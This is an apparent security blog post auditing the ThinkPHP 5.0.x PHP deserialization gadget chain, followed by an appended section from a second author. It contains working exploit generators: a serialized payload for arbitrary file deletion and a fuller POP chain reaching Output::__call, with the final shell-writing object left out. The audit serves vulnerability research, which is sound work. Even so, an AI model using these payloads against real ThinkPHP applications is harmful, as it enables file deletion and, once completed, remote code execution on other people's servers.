ThinkPHP 5.0.x deserialization chain audit

Foreword

Having gone through the ThinkPHP 5.1.x deserialization chain, it is now time for the ThinkPHP 5.0.x chain, which is a step harder than the previous one (233). That is what makes it fun; staying in the comfort zone all the time is too boring.

0x01

Installation is a one-liner with composer:

composer create-project topthink/think=5.0.14 tp5.0.14

Environment:
PHP 7.0.12 NTS + Apache

In the 5.1.x chain the exit point was the __call method of the Request class, which could be invoked directly. In 5.0.x the code at that spot is written differently: 5.1.x reads $this->hook[$method], an instance property that we control through the serialized object, whereas 5.0.x reads self::$hook[$method], a static property that is not part of the serialized object and therefore not controllable. So Request cannot serve as the exit class and another usable __call has to be found.
Here we use
thinkphp/library/think/console/Output.php; the __call method of the Output class can serve as the springboard.

Output::__call as the springboard
The POP chain entry point is still
think\process\pipes\Windows::__destruct

As learned in the previous article,
the destructor ends in removeFiles(), which loops over $this->files, calls file_exists() on each entry and then unlink(). If we control $filename this is already an arbitrary file deletion.
exp:

<?php
// Gadget stubs: only the class names and the one private property matter;
// the real methods are not needed to produce the serialized string.
namespace think\process\pipes;

class Pipes
{
}

class Windows extends Pipes
{
    // private, so it is serialized under the mangled name "\0think\process\pipes\Windows\0files"
    private $files = [];

    public function __construct()
    {
        // each entry is passed to file_exists() and then unlink() by __destruct
        $this->files = ['D:\PHPSTUDY2018\PHPTutorial\WWW\tp5\shell.php'];
    }
}

// base64 because the mangled private property name contains NUL bytes
echo base64_encode(serialize(new Windows()));

Naturally, the search for an RCE starts from that file_exists() call: passing an object instead of a string forces a string conversion, which invokes the object's __toString method.

Here is the path written out directly:

__toString -> toJson -> toArray

Note that 5.0.x has no Conversion trait holding __toString as 5.1.x does;
here __toString is defined directly on the think\Model class, so that is where the chain is triggered. Since Model is an abstract class, a concrete subclass has to be used when building the exp, for example think\model\Pivot.

Inside toArray() we look for a call of the form $a->function($b) where both $a and $b are controllable; that is what lets us reach __call.
As before, go through the concrete implementation of toArray().

In the toArray() method of the abstract Model class there are three places that can end up in __call.
The __call we want to reach has already been chosen:
think\console\Output::__call().
It is reached through the third of those places:

$item[$key] = $value ? $value->getAttr($attr) : null;

Here both $value and $attr must be controllable,
so they have to be followed up.
(Headache; I will note the train of thought briefly and come back to it tomorrow.)
Working backwards: $value is what getRelationData() returns, which can be the model's $parent, and $attr comes from the relation's getBindAttr(), so both are under our control
and $value->getAttr($attr) runs on an object of our choosing.
Backtracking from the Output class chosen above:
once execution reaches $item[$key] = $value ? $value->getAttr($attr) : null; with $value being an Output instance, the Output::__call magic method fires,
and the shell is written through what that __call can reach.
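As an added example (my own code, not the post's or the framework's), the generator below wires up the chain traced above as far as think\console\Output::__call: Windows::__destruct -> file_exists() -> Pivot::__toString -> toJson() -> toArray() -> $value->getAttr($attr). The class stubs carry only the properties the chain reads; their names and visibilities are taken from the ThinkPHP 5.0.24 source and are an assumption to check against the installed 5.0.x version. build_payload() is a helper name of my own. The object that $handle should point to (Output::write() calls $this->handle->write()) is deliberately left null, which is where the post stops.

```php
<?php
// Added example: payload generator for the ThinkPHP 5.0.x chain up to Output::__call.
// Property names/visibilities assumed from the 5.0.24 source; verify against your copy.

namespace think\process\pipes {
    abstract class Pipes {}                    // real hierarchy: Windows extends Pipes
    class Windows extends Pipes {
        private $files = [];                   // __destruct -> removeFiles() -> file_exists($file)
        public function __construct($file) { $this->files = [$file]; }
    }
}

namespace think {
    abstract class Model {
        protected $append = [];                // toArray() iterates this
        protected $error  = null;              // returned by getError()
        protected $parent = null;              // becomes $value in getRelationData()
        public function __construct($parent, $relation) {
            $this->append = ['getError'];      // method_exists($this, 'getError') -> $this->getError()
            $this->error  = $relation;         // must satisfy the Relation type hint
            $this->parent = $parent;
        }
    }
}

namespace think\model {
    class Pivot extends \think\Model {}        // concrete subclass; __toString lives in Model
    abstract class Relation {
        protected $query;                      // getModel() returns $this->query->getModel()
    }
}

namespace think\model\relation {
    abstract class OneToOne extends \think\model\Relation {
        protected $selfRelation = false;       // isSelfRelation() must be false
        protected $bindAttr     = [];          // getBindAttr(): foreach ($bindAttr as $key => $attr)
        public function __construct($query, $attr) {
            $this->query    = $query;
            $this->bindAttr = ['no' => $attr]; // $attr becomes the argument of getAttr()
        }
    }
    class HasOne extends OneToOne {}
}

namespace think\db {
    class Query {
        protected $model;                      // getModel() returns this object
        public function __construct($model) { $this->model = $model; }
    }
}

namespace think\console {
    class Output {
        private $handle = null;                // write() calls $this->handle->write(...)
        protected $styles = [];                // __call: in_array($method, $this->styles) -> block()
        public function __construct($handle, array $styles) {
            $this->handle = $handle;
            $this->styles = $styles;
        }
    }
}

namespace {
    // $attr ends up inside "<getAttr>$attr</getAttr>", the first argument to $handle->write().
    function build_payload($attr, $handle = null) {
        $output   = new think\console\Output($handle, ['getAttr']);
        $query    = new think\db\Query($output);                  // get_class(query model) == get_class(parent)
        $relation = new think\model\relation\HasOne($query, $attr);
        $model    = new think\model\Pivot($output, $relation);
        $windows  = new think\process\pipes\Windows($model);       // file_exists($model) -> __toString
        return serialize($windows);
    }

    // NUL bytes from private/protected name mangling, so base64 for transport.
    echo base64_encode(build_payload('hello')), PHP_EOL;
}
```

The output still has to reach an unserialize() call in the target application, as in the 5.1.x article. With $handle left null, reaching the springboard shows up as a fatal "Call to a member function write() on null" raised from think\console\Output::write(), which confirms the whole chain fired without writing anything; substituting an object whose write() method does something useful is the shell-writing step the post leaves open.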


Source: www.cnblogs.com/wangtanzhi/p/12663572.html